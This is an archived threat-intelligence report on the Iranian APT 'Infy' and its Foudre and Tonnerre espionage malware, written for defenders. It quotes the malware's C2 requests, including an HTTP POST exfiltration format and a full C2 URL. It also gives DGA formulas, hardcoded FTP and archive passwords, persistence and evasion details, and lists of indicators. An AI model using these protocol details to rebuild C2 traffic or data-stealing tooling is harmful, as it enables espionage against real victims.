{
	"id": "54c76a29-a3b7-42e3-9a38-5feb2f777e6a",
	"created_at": "2026-04-06T00:17:45.27639Z",
	"updated_at": "2026-04-10T03:36:22.895042Z",
	"deleted_at": null,
	"sha1_hash": "6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82",
	"title": "After Lightning Comes Thunder - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 144760,
	"plain_text": "After Lightning Comes Thunder - Check Point Research\r\nBy etal\r\nPublished: 2021-02-08 · Archived: 2026-04-05 14:25:56 UTC\r\nThe Most Persistent Iranian APT Rumbling Again\r\nBy: Safebreach Labs and Check Point Research\r\nSummary\r\nCyber warfare has long become a common practice in the arsenal of governments, armies, and intelligence agencies around\r\nthe world. What once used to be a black art, reserved to the elite of the elite and conducted by few, has now become a land\r\nof opportunities for almost any government around the world. Iran is no exception to this trend, with new discoveries made\r\nevery year repeatedly attributed to the Islamic republic.\r\nOne of the earliest Iranian cyber operations that was ever brought to light was “Infy” (aka “Prince of Persia”). Evidence for\r\nactivities of this operation dates back to 2007. This cyber operation was very active since its early stages, and was shown to\r\ntarget victims mainly in Iran and throughout Europe, and was likely a government-backed operation.\r\nIn this research, which is a cooperation between SafeBreach Labs and Check Point Research, we identify evidence of\r\nrenewed activity by this operation. It seems that following a long downtime, the Iranian cyber attackers were able to\r\nregroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and\r\ntooling capabilities.\r\nThis report will shed new-light on this long lasting Iranian cyber operation – revealing new techniques used, the underlying\r\ninfrastructure, stealth techniques and other new elements of this actor’s modus operandi.\r\nKey findings:\r\n1. A new, previously unknown, second stage malware with extended capabilities.\r\n2. A more mature form of the known “Infy” malware family.\r\n3. 
A review of recent C2 infrastructure including HTTP/FTP servers and RSA signatures.\r\nBackground\r\nIn 2016, Palo Alto Networks’ Unit 42 discovered Infy, an APT which was presumed attributed to Iran and had an interesting\r\nchoice of targets, amongst them US Government and Israeli companies. The operation’s activity had been traced all the way\r\nto 2007. At the time, Qi-Anxin focused on a specific attack targeting Danish diplomats, and named the attack Operation\r\nMermaid, which covered the same methods and infrastructure.\r\nAfter the publication, Unit 42 decided to conduct a takedown operation. This gave the researchers more visibility about the\r\norigin of victims, the motive of the attackers and the scope of the attack. The data gathered reaffirmed the Iranian connection\r\n– most victims were either in Iran, or were Iranian dissidents, and the attackers did not seem to be financially motivated. As\r\na result of the takedown Infy lost access to almost all of the campaign victims.\r\nResearch by Claudio Guarnieri and Collin Anderson elaborated more on the Iranian attribution.\r\nThe threat group compromised two news websites related to Jundallah as early as 2010, and exploited ActiveX\r\nvulnerabilities to attack the websites’ visitors. Infy seemed to have operated heavily around the 2013 Iranian Presidential\r\nelections, targeting Persian press members (such as BBC Persian), and resumed attacking civil society members and\r\nactivists afterwards.\r\nGuarnieri \u0026 Anderson also observed that after the takedown by Palo Alto Networks, the Telecommunication Company of\r\nIran blocked and redirected any traffic originating from Iran and aimed at Palo Alto’s sinkholes. This was probably a\r\ndeliberate attempt by the actors to reduce visibility and regain control of the victims. 
This is not an ability demonstrated by\r\nmost threat actors (indeed, we are hard-pressed to find precedent for it), and it suggests a potential connection to the Iranian\r\ngovernment.\r\nFollowing these events, the operation wound down until August 2017, when Infy’s activity was observed again, this time\r\nthrough the use of a new malware dubbed Foudre.\r\nRecent activity – lightning strikes again\r\nDuring the first half of 2020, new versions of Foudre emerged with new documents designed to lure victims. These operated\r\nin a slightly different manner than before – instead of having the victim click on what appears to be a link to a video, the\r\nmalware would run a macro once the victim closes the document.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 1 of 17\n\nFigure 1: Full infection chain.\r\nFigure 2: Example of a document sent to potential victims.\r\nOne document (Figure 2) contained a photo of Mojtaba Biranvand, the governor of Dorud city in Lorestan Province, Iran.\r\nThe document is in Persian and includes information regarding the governor’s office and his phone number (the number\r\nactually belongs to a lawyer in Lorestan).\r\nAnother document, also in Persian, contains the logo of ISAAR, the Iranian government-sponsored Foundation of Martyrs\r\nand Veterans Affairs which provides loans to disabled veterans and families of martyrs.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 2 of 17\n\nFigure 3: ISAAR document sent to potential victims.\r\nWhen the victim opens the document, a macro extracts the embedded package to the temp directory as fwupdate.temp and\r\nexecutes it after the document closes.\r\nIn 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored\r\nin Intezer’s research. 
In fact, this was a new component — called Tonnerre — which was a new step in the evolution of\r\nInfy, and contained various functionality absent from Foudre alone.\r\nVictims\r\nWe used several methods to try and determine the current victims of Foudre \u0026 Tonnerre.\r\nThe first was registering the DGA domains ourselves, and listening to coming connections with the parameters the malware\r\nsent. We filtered out repeat connections, which were uncommon to the malware (these could indicate traffic generated by\r\nresearchers – we can only speculate). Only a few dozen victims contacted our servers.\r\nA curious point is that none of these victims were Iranian, which may indicate the attackers learned from the takedown and\r\nhad the DNS records in Iran changed preemptively (although this, again, is purely speculation).\r\nThe second method we used to probe the campaign was passive DNS. That way we were able to see a broader scope of the\r\nattack. For example, we could see if some IP address was the origin of several resolution requests in succession, and in some\r\ncases if the connectivity check occurred right before attempting to connect to the C2 server. Ignoring traffic which doesn’t\r\ncorrelate with the correct dates for the domain, we were left with a handful of new victims. Two targets with persistent\r\nconnectivity, as well as a connectivity check prior to contacting the C2, were in Turkey – one belongs to a University, and\r\nthe other belongs to a state owned investment bank.\r\nBelow is the distribution of victims by geolocation. These correlate with previous findings on Infy, except for the glaring\r\nabsence of Iranian victims.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 3 of 17\n\nFigure 4: Victim distribution by country\r\nFoudre Known Versions\r\nVersion No. 
Timestamp Notes\r\nFoudre 1-2 Februrary 2017 Discovered by Palo Alto in 2017\r\nFoudre 3 October 2017  \r\nFoudre 7 Probably April 2018 Newly discovered\r\nFoudre 8 August 2018 Discovered by Intezer in 2018\r\nFoudre 20 April 2020 Newly Discovered\r\nFoudre 21 July 2020\r\nFoudre 22 October 2020\r\nFoudre Version Differences\r\nMost differences include minor technical detail, such as Window names, Export function names and strings. However the\r\nlatest versions of Foudre include some key differences:\r\nDGA Formula – The updated algorithm for generating domains computes a CRC32 of the string NRV1{}{}\r\n{}.format(date.year, date.month, weeknumber) , with a start date of December 27, 2018.\r\nThe possible TLDs are: .space , .net, .dynu.net, .top .\r\nThis is probably to evade detection of security vendors who are using the previously published DGA.\r\nC2 RSA Verification – Foudre verifies the server is authentic by downloading a signature file, signed by the server\r\nand verifying it. This makes the operation more resilient against third-party takedowns.\r\nFoudre string not present – In previous versions the window which was used for keylogging was named “Foudre”,\r\nwhich brought the malware its name. In the latest version, this was changed to “Form1”. This change could help the\r\nmalware evade signature detection (and generally, this sort of thing should be kept in mind when writing signatures).\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 4 of 17\n\nFigure 5 – Foudre version 20. \r\nEmbedded articles\r\nOne of the discoveries that caught our eye during the analysis was a unique piece of text embedded in each of the binaries.\r\nThis text was copied from various media websites from around the time when the binary was released. 
This finding can\r\nconfirm that the date of the sample is at most as old as those articles.\r\nFoudre version 21 included a text from an article published on July 29.\r\nFigure 6 – July 2020 article embedded into Foudre version 21\r\nFoudre version 22 had the next message, coming from an article published by the BBC:\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 5 of 17\n\nFigure 7 – October 2020 article embedded into Foudre version 22\r\nAfter connecting to the C2, Foudre downloads an encrypted self-extracting archive (SFX), and then decrypts and runs it. The\r\nSFX includes an executable and an RSA public key.\r\nTonnerre – Second-Stage Payload\r\nFoudre’s new versions were downloading Tonnerre 11 as the payload, but the first two versions were also tracked. Version\r\n“10” is actually the earliest sample, which was dropped by Foudre 8. For more information, see Appendix B.\r\nVersion No. Time of emergence Notes\r\n10 – MaxPinner August 2018 From Foudre 8\r\n1 September 2018 Newly discovered\r\n2 March 2019 Newly discovered\r\n11 Probably July 2020 Newly discovered – latest version\r\nTonnerre is used to expand the functionality of Foudre; possibly its functionality was put into a separate component to make\r\nsure it is deployed only when needed, and meets fewer prying eyes. Like Foudre, it is written in Delphi.\r\nIts capabilities:\r\nSteals files from predefined folders as well as external devices.\r\nExecutes commands from the C2 server.\r\nRecords sound.\r\nCaptures screen.\r\nThe executable is exceptionally large at 56Mb, and camouflages itself as legitimate software.\r\nVersion 1 is camouflaged as “SilverSoft Speed”, and version 11 as “Synaptics”.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 6 of 17\n\nFigure 8  – Tonnerre v.1 – Silversoft Speed. 
\r\nLike Foudre, Tonnerre has embedded strings from news articles which reinforces the notion that both tools come from the\r\nsame developers.\r\nFigure 9  – Tonnerre version 11 hardcoded strings.\r\nSimilar to Foudre, Tonnerre uses a DGA to find its C2, and verifies it as a valid server using an RSA signature, which is\r\ndecrypted with the public key from the SFX.\r\nTonnerre uses this C2 to:\r\nStore general metadata about the victim\r\nSteal files with predefined extensions\r\nDownload updates.\r\nGet an additional C2.\r\nThe second C2 is used to store the stolen data, and it can also provide a list of commands to run.\r\nCommunication to the first C2 uses HTTP, whereas the second C2 communicates using FTP. The FTP password is\r\nhardcoded in the malware, but the username is the name of the victim’s computer, which was previously sent to the HTTP\r\nC2.\r\nAppendix A – Tonnerre deep dive\r\nForms\r\nThe malware contains 5 Delphi forms, with each one responsible for a different capability:\r\nForm1 – Malware Installation and upgrading process.\r\nThe malware runs for the first time with param /set \u003cmachine GUID in hex\u003e, creates an installation folder and copies itself\r\nas helper.exe. The second installation stage creates a link and runs its persistence mechanism:\r\nA scheduled task for helper.exe -ex \u003cmachine GUID in hex\u003e.\r\nRegistry “Run” key.\r\nRunning it with a wrong GUID, or on another machine will fail because the malware verifies that GUID value. It also\r\nverifies that the “Deep Freeze” process is not running, otherwise Tonnerre exits immediately.\r\nTonnerre also checks for the presence of Kaspersky endpoint protection by looking for a “Kaspersky Lab” folder under\r\n%programfiles%. If this folder exists, the malware tries to bypass detection by performing a sleep cycle after setting its\r\npersistence.\r\nForm2 – Collects files from predefined folders – Documents, Downloads, Pictures and more. 
It also sets a notify event for\r\nspecific file types like MS Word files.\r\nFiles are also collected from network shares using WNetOpenEnumW and WNetEnumResourceW functions from mpr.dll.\r\nPrint screens are also collected if the screen saver is not active at the moment of checking.\r\nForm3 – Connects to an FTP server to exfiltrate collected data and get further commands.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 7 of 17\n\nForm4 – Collects files from removable devices for exfiltration. This is done by monitoring WM_DEVICECHANGE\r\nmessages and enumerating the devices.\r\nForm5 – Uses the lame command line tool to record sound. This is somewhat similar to another Iranian attributed APT,\r\nNazar, which used it as a DLL. Despite this similarity, there doesn’t seem to be a link between the groups.\r\nThe exact command line is: lame.exe -b 8 -m m rvfrtc8.tmp fcvd10v.tmp\r\nC2 Communication\r\nDGA\r\nThe dga start date is 12/25/2017 with the next TLDs: '.site','.com','.win' .\r\nThe domain is decided by the next formula:\r\n\"NITV1{}{}{}\".format(date.year, date.month, weeknumber)\r\nOne of the generated C2 servers is 638ffe48.site . 
Like all other domains since March 2020, this was resolved to the IP\r\naddress 185.141.61[.]37 .\r\nThe malware uses http://www.france24.com/en/top-stories/rss/ to get the current date for the DGA.\r\nReceiving Executable Updates\r\nFirst, just like Foudre, the malware verifies the HTTP C2 server by downloading a signature file using the next GET request:\r\n/s/?d=\u003cdays from first date\u003e\"\u0026t=\u003ctimestamp\u003e\"\r\nNext, after verifying the C2, the malware downloads the second signature file.\r\nGET /2017/?c=\u003ccomp-name\u003e\u0026u=\u003cuser-name\u003e\u0026v=00011\u0026f=fdir1\u0026mi=\u003cmachine-guid\u003e\u0026t=\u003ctimestamp|\u003e HTTP/1.1\r\nThe C2 server responds in a location field: update32.sig.\r\nThe sig file is downloaded from /2017/update32.sig\r\nFinally, a request is sent to 2016/update32.tmp (this URL was not responsive when we checked). An SFX is downloaded,\r\ndecrypted and executed, with a random looking password (in our case it was TtckjcAa54cE ).\r\nGetting the FTP Server\r\nThe malware gets the C2 FTP server IP address by performing the next request to the C2 server:\r\nGET /f/?c=\u003ccomputer-name\u003e\u0026mi=\u003cmachine-guid\u003e\u0026t=\u003ctimestamp\u003e HTTP/1.1\r\nThe C2 uses the same HTTP redirection with this response format:\r\n\u003cyear\u003e\u003cdays since last first dga day\u003e\u003c.tmp\u003e\r\nFor example: 2020209.tmp .\r\nIt then performs a GET request to /f/2020209.tmp . Example for a downloaded file:\r\n266/:5/321/93\r\nAVqGDTHK6ZAbnNtvg09lHkXUUBw2UYho18bjE9f6ILDw9SYCEPR0R1TS6+4H/UpjrV3Z+m0BpEaxdWW9qul9pDNYS7LkZOWx2G18JI8X/aWwC+yQoL2wC6aGZnBU+gSBAtK3NrerV\r\n69\r\n1512\r\n443\r\nThis file has 3 parts:\r\n1. The obfuscated FTP server. The IP could be retrieved easily using a python one-liner: print(bytes([ch-1 for ch in\r\nb'266/:5/321/93'])) which gives 155[.]94[.]210[.]82.\r\n2. An RSA signature of the FTP server.\r\n3. 
List of open ports on the FTP server.\r\nFrom this point on, the malware uses that server to fetch its next command. After executing the command, the output is\r\nuploaded using FTP as well.\r\nFTP Protocol\r\nLogin\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 8 of 17\n\nThe malware connects to the FTP server using its computer name as the username and one of two fixed passwords:\r\n“tpass15A42” or “tpass14A43”. The password can be decoded using the same Python snippet used for getting the FTP\r\nserver.\r\nFigure 10  – Deobfuscated FTP passwords.\r\nCommand Execution\r\nCommand execution process is done by downloading a command file from the FTP server. We were able to enumerate the\r\nfollowing commands:\r\nMyIdle\r\nMyDelete\r\nMyRename\r\nMyRun\r\nMyEndTask\r\nMyZip\r\nMyShell\r\nFTP – GET\r\nFTP – PGET – get multiple files.\r\nFTP – PUT – upload a file.\r\nFTP – upload dirlist (using FTP put)\r\nDual Data Exfiltration\r\nExfiltration of data which was collected based on the C2 server command is performed via FTP.\r\nExfiltration of data collected otherwise (built in Tonnerre logic) is performed via HTTP POST request:\r\nPOST /blog/?\u003ctimestamp\u003e HTTP/1.1\r\nAnd the next data fields:\r\nc=\u003ccomputer-name\u003e\u0026u=\u003cuser-name\u003e\u0026v=00011\u0026f=fdir1\u0026mi=\u003cmachine-guid\u003e\u0026txt=\u003cexfil data\u003e\u0026e=EOF\r\nThe C2 server response for a valid exfiltration is misleading:\r\n“There is a problem, the page you requested does not exist”\r\nThere are also custom 404 error response messages when requesting a valid directory in the server:\r\n“Not Found\r\nThe requested URL was not found on this server.\r\nAdditionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”\r\nTonnerre searches for files based on the file extension:\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 9 of 17\n\nFigure 11 – file types 
Tonnerre exfiltrates\r\nExfiltrated files\r\nAn example of the name of the file format is:\r\n\u003cfile name crc32\u003e-\u003cfile size\u003e-\u003cmodified timeStamp\u003e-\u003ccreated timeStamp\u003e\r\ne.g. ceb60f97-53807-1597696028-1360110435\r\nThe exfiltrated data is in a format of a WideChar array, and should end with the following suffix: \u003cComputer name\u003e\u003cuser-name\u003e\u003cversion\u003e\u003cdirectory\u003e\u003cmachine-guid\u003e\u003cexfil file path\u003e\r\nThe data also should be base64 encoded before put into the message body.\r\nThe content is – base64 encoded zlib encrypted file content and after it the file’s metadata in hex:\r\nComputer name, username, Tonnere version, uploaded dir in c2 server, machine GUID and file path in the victim’s machine.\r\nFile and input capture and collection\r\nThe malware creates several directories to store the stolen files:\r\n“R”, “F”, “H”, “V”, “S”, “G”.\r\nFigure 12  – The list of directories used for exfiltrated data: R,F,H,V,S\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 10 of 17\n\nG = Grabbed (files from recycle bin)\r\n`.doc` files grabbed from the recycle bin.\r\nF = Fixed (all .doc files from supported drive types)\r\nThe drive types that are supported: fixed, remote, ramdisk, removable\r\nS = Screen\r\nSaved as psf files (Print Screen File).\r\nH – files from predefined folders and network shares\r\nFiles from user directories (downloads, pictures, contacts) and from network shares are saved in H.\r\nR  = Recent files\r\nFiles that were written to the “Recent Items” folder, as enumerated in the\r\n`Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Recent` registry key.\r\nV = Voice Recording\r\nUsed for the voice recordings generated by Form 5.\r\nAppendix B – Foudre deep dive\r\nFoudre version 20-22\r\nC2 Protocol\r\nAs we showed previously, the C2 server is first authenticated by downloading a signature file obtained by querying 
the next\r\nHTTP GET request:\r\nGET \u003cC2 server host name\u003e/de/?d2020209.sig\u0026v=00020\u0026t=\u003ctimestamp\u003e HTTP/1.1\r\nThe server does HTTP redirection with the following value:\r\nLocation: \u003cC2 server host name\u003e/2020209.sig\r\nThis creates a GET request on this location:\r\nGET /de/\u003cC2 server host name\u003e/2020209.sig HTTP/1.1\r\nAfter the C2 server is verified as trusted, the malware checks for new versions of the malware by trying to download a\r\nsecond signature file.\r\nThis is done by the next GET request:\r\nhttp://\u003cC2 server host name\u003e/2015/?c=\u003ccomputer name\u003e\u0026u=\u003cusername\u003e\u0026v=00020\u0026\r\ns=Test201\u0026f=datadir1\u0026mi=\u003cmachine guid\u003e\u0026b=\u003cos 64/32 bit arch\u003e\u0026t=\u003ctimestamp\u003e\r\nFigure 13 – July 2020 article embedded into Foudre version 21\r\nThe C2 server returns a signature file named t00011-3.sig, which refers to Tonnerre version 11.\r\nThe final step is performing a request to download the latest version of the malware:\r\nGET /2014/t00011-3.tmp HTTP/1.1\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 11 of 17\n\nFigure 14 – July 2020 article embedded into Foudre version 21\r\nThe server responds with an encrypted RAR SFX file with the password RBA4b5a98Q.\r\nAfter decryption, we got the Tonnerre malware version 11 and a public key file.\r\nThe size of the malware is 56MB, an unusual size for malware samples and which may allow it to avoid detection as many\r\nvendors ignore large files and won’t scan\\monitor them.\r\nFigure 15  – t00011.tmp –  SFX file\r\nTonnerre 11 is the latest version served from the c2 as of our research. 
It has been using the exact same update file since at\r\nleast as early as 27/7/20, and until at least as late as 14/11/20.\r\nThe path of the embedded object C:\\Users\\Alex\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\   was also\r\nused in an earlier Word dropper which drops Infy version 21:\r\nFigure 16  – The embedded path into Version 21 document\r\nCampaign Names\r\nWhen we observed the HTTP requests, we could see the subject name “TehN005” which seems to have served as a sort of\r\ncampaign ID:\r\nhxxp://35b268a6.top/2015/?c=\u003ccomputer-name\u003e\u0026u=\u003cuser-name\u003e\u0026v=00022\u0026s=TehN005\r\n\u0026f=datadir1\u0026mi=\u003cmachine-guid\u003e\u0026b=64\u0026t=\u003ctimestamp\u003e\r\nFoudre Ver. 1 – 2017FSU\r\nFoudre Ver. 2 – 17weh44 – (probably 2017 week 44)\r\nFoudre Ver. 3 – af17818 – (probably 18/8/17) – was downloaded from the C2 http://eab6ff48[.]stream/update/af17818.tmp\r\nresolved to 185.148.144[.]3 (VirusTotal) which also resolved to eab6ff48.dynu.net. This means that Foudre was downloaded\r\nfrom an additional host name \u003cdga hostname\u003e.streamWas probably sent by email – (virusTotal 2017-10-06 14:13:29\r\n59bbae76 – email)\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 12 of 17\n\nFoudre Ver. 4/5 – DynuSub (probably refers to the C2 domain dynu.net)\r\nFoudre Ver. 7- S180313 – (probably 13/3/18)\r\nFoudre Ver. 11 – Rec11-1 – (probably Recording version 11)\r\nFoudre Ver. 20 – Test201 (Test 1 version 20)\r\nFoudre Ver. 21 – TehN002 – (probably version Number 2)\r\nFoudre Ver. 22 – TehN005 – (probably version Number 5)\r\nSFX File\r\nThe executable file dropped by the above macros is an SFX File – Self-Extracting archive.  When we decompress it, we get\r\nan extraordinary executable size – 275 MB.\r\nFigure 17 – SFX content of Foudre 21\r\nIt uses rundll to load “conf4389.dll” (Foudre loader), which in turn runs DLL “d488” and calls an exported function named\r\n“f8754”. 
The loader also creates a persistence mechanism by scheduling a task to run itself again.\r\nFoudre 8 – Tonnerre first occurrence\r\nAs mentioned previously, Tonnerre was already deployed in Foudre version 8 that was featured in Intezer’s publication.\r\nThe attack vector chosen was an SFX embedded into an office document. In the later versions that we analyzed, the contents\r\nof the SFX were different.\r\nFigure 18  – Content of Foudre 8 SFX\r\nc38533b85e4750e6f649cc407a50031de0984a8f3d5b90600824915433a5e218\r\nThe new SFX includes the following files:\r\n I7234.dll is the initial loader.\r\nd388 is the first loaded dll as Foudre version 8.\r\ndfbpbtge.tmp is a sample with different capabilities which is the successor of past “Infy M” – used as a second stage\r\npayload.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 13 of 17\n\nFigure 19  – dfbptge.tmp – Tonnerre/“Max Pinner”\r\nThis loader executes what was defined by Intezer as an “unknown binary”. The execution of this binary happens only in the\r\nabsence of the process “dfserv.exe”, which belongs to Faronics’ Deep Freeze.\r\nThe payload also checks if previous versions of this malware family are already installed on the victim’s computer. The\r\ncheck is done by searching for the window name Tonnerre from version 1 to 9.\r\nThe C2 server has a fixed hardcoded address instead of the usual DGA algorithm used by Foudre. The decrypted C2 is\r\n`pinner.website` which probably explains why this version was named MaxPinner internally.\r\nFigure 20  – dfbptge.tmp – Tonnerre appears for the first time.\r\nFigure 21  – dfbptge.tmp – fixed C2 server – pinner.website.\r\nFoudre 7 – previously unknown\r\nThe sfx is quite different from other versions:\r\nIt includes a white picture image file Thumbs.bmp which has a size of 63M probably to increase the size of the SFX. 
There\r\nis also a third dll, “r3066”, which is just used to call the D2 export of the main Foudre’s dll d392 instead of calling it from\r\nthe loader dll i7765.dll.\r\nThe decoy movie is violent and is called shkanje46.mp4, which in Persian means trigger46 (another hint for the attacker\r\nattribution and the native language of the victim).\r\nFoudre 7 is the last version that used obfuscation of strings.\r\nFigure 22 – Content of Foudre 7 SFX\r\nAppendix C – IOCs\r\nHashes\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 14 of 17\n\nFoudre 3 dll\r\nCBA270CBB084929E51BCF68145992FF3DD048887F4B9ED3A54970F1151BB1FDF\r\nFoudre 4 dll\r\n00cfef0d163b6cb312c07b4b49bd230121db15433204bc674350a8126665ba0f\r\nFcd23c3e7e4027425786d4dfdf6e56912ad59bc5db935d32bf877b34bb7e4a86\r\nbebfbc715a0236b4fd93347f69c93aae34acbb6f9f9555284edf22378fbeb86a\r\nFoudre 5 dll\r\ne6eed21fa1c9dc28b140a4b7633636461eefaeab214647f53d3b666158c28674\r\nfa48da8189b9f4dd8ad011a0bac135ae82f9d493d6a9feeea5ac1abeae8ce202\r\nFoudre 7 dll\r\n4BA5192DAB8C27DB8BBA0E5B9D6887EA81299C88536FA590735E55B88AACE759\r\nFoudre 11 dll\r\n20ffed3d57e4a49d0e20f18283ae7e5e5a7ef3249be3f04b50e78f10ec8b8989\r\nFoudre 20 dll 941CA9F74FBC5E73C9C8248548C1F0D1ADC646126EE6C45A0CE34FE39A52F030\r\nFoudre 21 dll\r\n0B094D25E97CC254A53BEC0943D682C1EEBBF7437067B14C7B71619110DFAF83\r\nFoudre 22 dll\r\n6931EE281C895BB9446689C8CB648E2ED353B06D454CFB4418490EF82CA07BF1\r\n4853a8acc62d6586eddfb30dcbb97ffa82c5f65460708fd3a969c88e29f99160\r\nimpHash Foudre version 21-22 dll\r\n78d9bed21db68b9d8c53b8f62bc5314f\r\nTonnerre 1 exe\r\nE124c048f5ddf2d9af6dcb6f8a70d6a2b2f79a0ba9486b17b52baae98d8d23de\r\nTonnerre 2 exe\r\n6254613570fb43ae1b95bc08868a6023c2c04f8b69fe3e5ce0ffb6db273afddc\r\nTonnerre 11 exe\r\n82D370D941FCDE13DFC568FDCA007BF469E5900B6F6B93C1829AB0CC7ED0F56C\r\nMalicious Word doc with macro dropper\r\nVersion 22 dropper  b97960c29b7c8234981728b80060a42dbe32bf625b052854a6cc2175467cca89\r\nVersion 21 dropper 
ccbda8a84dbeda1a66780c76fd9f507778c9fb992c7eee87e99cc3ca314009ee\r\nFoudre SFX\r\nVersion 3\r\n160bb722bd70b70c3e993c8eba59d8cf8117899073a4a6e42b0240d858a98dad\r\nVersion 7\r\n97dfd41db47149a815f59eae44b490ba10af588b69fbea2a84d7a2ae448a37a0\r\nVersion 21  A64EDB19E71549FB9248B27B58F911A4A1E8CD8B8E4ADFF93ECFB7E15A3CDAD7\r\nversion 22\r\nF535b46ad2452d61282f615faf35993e83b6c56c9533bf22c12f97f318242e06\r\nFoudre Loaders\r\nVersion 7\r\nVersion 21 conf3234.dll\r\nF48CC6F80A0783867D2F4F0E76A6B2C29D993A2D5072AA10319B48FC398D8B7A\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 15 of 17\n\nVersion 22  conf4389.dll\r\n9F64EC0C41623E5162E51D7631B1D29934B76984E9993083BDBDABFCCBA4D300\r\nVersion 22 identical to conf4389 but chopped suffix (1.1M instead of 4.3M)\r\n7ac73f2e5ea0ca430cf21738d3854b8a5b6a25ae4a85d140fc7e96cb87f7e2ea\r\nAll have imphash: 39507b319f55d0fec705f6dea39a0dfb\r\nTonnerre SFX\r\n21265793D0B91845145EA37BE68627855503C5505248C3CA31399CB3A9C288B4\r\nTonnerre cert file\r\n87C70DA933731D0E0AC58EAD236E0FB21F2A7E1BBEEAF37EE78D0DFBD70FD961\r\nDomains\r\nFoudre 20 C2 domains:\r\n2020-11-03 35b268a6.top\r\n2020-11-03 35b268a6.space\r\n2020-11-10 1e9f3b65.top\r\n2020-11-10 1e9f3b65.space\r\n2020-11-17 07840a24.top\r\n2020-11-17 07840a24.space\r\n2020-11-24 801c16eb.top\r\n2020-11-24 801c16eb.space\r\n2020-12-01 8bb28844.top\r\n2020-12-01 8bb28844.space\r\n2020-12-08 5bb2593a.top\r\n2020-12-08 5bb2593a.space\r\n2020-12-15 42a9687b.top\r\n2020-12-15 42a9687b.space\r\n2020-12-22 69843bb8.top\r\n2020-12-22 69843bb8.space\r\n2020-12-29 709f0af9.top\r\n2020-12-29 709f0af9.space\r\nTonnerre 11 C2 domains:\r\n2020-11-03 a74d1205.site\r\n2020-11-10 3e4443bf.site\r\n2020-11-17 49437329.site\r\n2020-11-24 d9fc6eb8.site\r\n2020-12-01 acbde077.site\r\n2020-12-08 cc7a6992.site\r\n2020-12-15 bb7d5904.site\r\n2020-12-22 227408be.site\r\nIP Addresses\r\nHTTP Servers\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 16 of 
17\n\nFoudre\r\n172.96.184.191 – active since 15/12/2020\r\n185.56.137.138 – was active until 15/12/2020 \r\n185.28.189.215\r\n185.61.154.26\r\n198.252.108.158\r\nTonnerre\r\n93.115.22.216 – active since 6/1/21\r\n185.203.116.111 – active until 6/1/21\r\n185.141.61.37\r\n185.206.144.175 \r\nFTP Servers\r\n54.37.60.199 – new server since 30/12/20\r\n54.36.40.208\r\n79.137.24.207\r\n155.94.211.212\r\n155.94.210.82\r\nRSA Certificates\r\nTonnerre Public Certificate file content\r\n4E 0A 4C 6F 63 6B 42 6F 78 33 01 00 00 00 03 00 01 00 00 51 F0 00 D8 97 48 C7 5B 0A BF F4 98 AB C6 1F 28 13 FC\r\nD7 C5 5E E4 A6 71 E5 41 8E F4 8D 41 BD 8F 4C E3 EF 3F FC 8C BD B9 4F 55 F6 E5 0F 83 D9 D3 D4 56 FC DC D0 BE\r\n5B 5F 29 37 0F 87 43 5E D0 1C 2F 49 8D 2F 88 49 A3 88 DA 4A CE 37 95 81 6C C1 DF 40 1F 43 27 6C A6 11 57 E1 8B\r\nBA B2 1A 9F 1D F0 F5 C0 18 64 6F CB D0 07 8A 9C 39 87 A3 77 0E 33 C2 6F 6E FA 89 73 9B 4A 92 90 79 58 07 F4 79\r\nA9 0F 30 9D 9C 28 24 3E 3B 6B 3B 69 87 14 AF 99 FC 9F 24 47 BC BB 2A A1 2A 68 4F B4 5E E5 E5 5C C8 24 DA D6\r\n8B 40 F2 5E EA D5 C9 EE 42 5D B0 43 A4 C3 EE 91 8E 54 AE E8 A0 26 4C 11 8F 23 1C 71 43 73 07 99 98 9A 00 59 8A\r\n96 42 0F C1 15 A4 E0 39 0F 17 E6 17 7B B6 54 1D 83 61 A1 8F D2 1A 72 04 33 67 C6 92 7E 2B F6 C2 24 C6 92 D9 94\r\n19 09 8C 5C 5C 2A 4E 6A AD F6 EA CD 33 5F 6C E5 40 BC 03 00 00 00 01 00 01 4E 0A 4C 6F 63 6B 42 6F 78 33 01 00\r\n00 00 03 00 01 00 00 3B 88 FB D8 1F C2 3F 35 1F 2D EB 36 D6 16 C2 DE 64 2C 5A 8C 6F FD 0E B7 DB 17 37 D4 1A\r\n1A 55 A7 A5 0B 28 F3 01 31 EE 5C A5 5B 50 69 E5 94 63 95 2C 9D E4 1D D7 3A 87 36 C7 AE 81 80 F0 25 6A 7C BB 48\r\nCE 9D E3 74 13 B4 7C 15 56 62 08 5C AB F2 4B 68 2A C3 60 80 CB 2F FD 88 85 32 63 43 9C 47 90 89 2A A3 CF 5A 89\r\nA5 69 19 9E 81 94 0C C3 7E 9B A6 80 95 CC 01 CF D4 44 6F FA CC E1 07 0D 17 24 EB 97 6C 8D CC 35 0A C0 51 12\r\nF4 C8 E7 E9 1F 4C 42 50 DE 5C 8A 94 24 71 8A C9 B2 D0 C5 75 0B 82 1C 36 5A C6 B9 10 B4 6E 21 